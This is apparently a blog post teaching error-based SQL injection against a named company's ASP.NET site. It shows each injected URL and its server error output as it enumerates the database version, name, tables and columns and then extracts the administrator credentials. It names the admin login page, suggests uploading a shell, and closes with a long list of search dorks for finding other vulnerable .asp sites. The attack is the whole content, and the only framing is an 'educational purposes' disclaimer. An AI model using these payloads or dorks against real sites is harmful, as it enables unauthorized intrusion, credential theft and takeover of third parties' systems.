THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES AND I AM NOT RESPONSIBLE FOR ANYTHING YOU DO ILLEGAL
i am going to give a tutorial on how to hack a aspx site.
the procedure are given below
the url in which the attack will be done is:
or
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=1
1st step:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6
' having 1=1--
it will give the following error
Column 'tbl_PRODUCT.id' is invalid in the select list
because it is not contained in either an aggregate function or the GROUP BY
clause.
it means this site is vulnerable
step2:
to know the version
name type the following command
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6
'and 1=convert(int,@@version)--
output is:
Server Error in '/' Application.
Conversion failed when converting the nvarchar value
'Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 6.1 (Build 7601: Service
Pack 1)
' to data type int.
here Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29 is the version
to know the database name type this
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6
'and 1=convert(int,db_name())--
output:
Conversion failed when converting the nvarchar value
'dbsterlite' to data type int.
dbsterlite is database name
finding username:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6 'and 1=convert(int,user_name())--
output:
Conversion failed when converting the nvarchar value
'db_hoststerlite' to data type int.
STEP3:
finding table names
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from
information_schema.tables))--
OUTPUT:
Conversion failed when converting the nvarchar value
'tbl_subcategoryname' to data type int
here 1st table is 'tbl_subcategoryname'
then we have to find the 2nd table:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from
information_schema.tables where table_name not in('tbl_subcategoryname')))--
OUTPUT:
Conversion failed when converting the nvarchar value
'tbl_testimonials' to data type int.
tbl_testimonials is the 2nd table
for 3rd table
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from
information_schema.tables where table_name not
in('tbl_subcategoryname','tbl_testimonials')))--
continue this type of commands until you donot get any types
of error
the table are:
1=tbl_subcategoryname
2=tbl_testimonials
3=tbl_News
4=tbl_advertisement
5=tbl_career
6=tbl_category
7=tbl_classified
8=tbl_inquiry
9=tbl_adminmaster
10=tbl_futureproducts
11=tbl_gallery
12=tbl_product
13=tbl_productphoto
14=tbl_quatation
here we want the admin name and password.so the table we
needed is
tbl_adminmaster
STEP4:
finding columns name
for 1st table:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from
information_schema.columns where table_name='tbl_adminmaster'))--
OUTPUT:
Conversion failed when converting the nvarchar value 'id' to
data type int.
1st column is id
for 2nd column:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from
information_schema.columns where table_name='tbl_adminmaster' and column_name
not in('id')))--
OUTPUT:
Conversion failed when converting the nvarchar value
'username' to data type int.
2nd column is username.
then
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from
information_schema.columns where table_name='tbl_adminmaster' and column_name
not in('id','username')))--
OUTPUT:
Conversion failed when converting the nvarchar value
'password' to data type int.
continue this type of command until there is no error
fro example if we enter the following command
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from
information_schema.columns where table_name='tbl_adminmaster' and column_name
not in('id','username','password')))--
the page will load correctly with out any errors
it means there is
only 3 columns in the table 'tbl_adminmaster'.
STEP5:
extracting the information
after getting the required table name and column names,the
following commands can be used to extract information
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 username from
tbl_adminmaster))--
OUTPUT:
Conversion failed when converting the varchar value 'admin'
to data type int.
here username=admin
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 password from
tbl_adminmaster))--
OUTPUT:
Conversion failed when converting the varchar value 'admin'
to data type int.
password=admin
then you can find the
admin login page by using
'havij'
the admin login page is
http://sterlitelubricants.com/admin/login.aspx
Then after login as admin you can upload your own shell and do whatever you want.Iwill explain how to upload your shell in later tutorials
Then after login as admin you can upload your own shell and do whatever you want.Iwill explain how to upload your shell in later tutorials
you can also find this types of vulnerable sites from goole
dork
examples:
inurl:.asp?sid=
Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCate gory
="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID=
"
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
No comments:
Post a Comment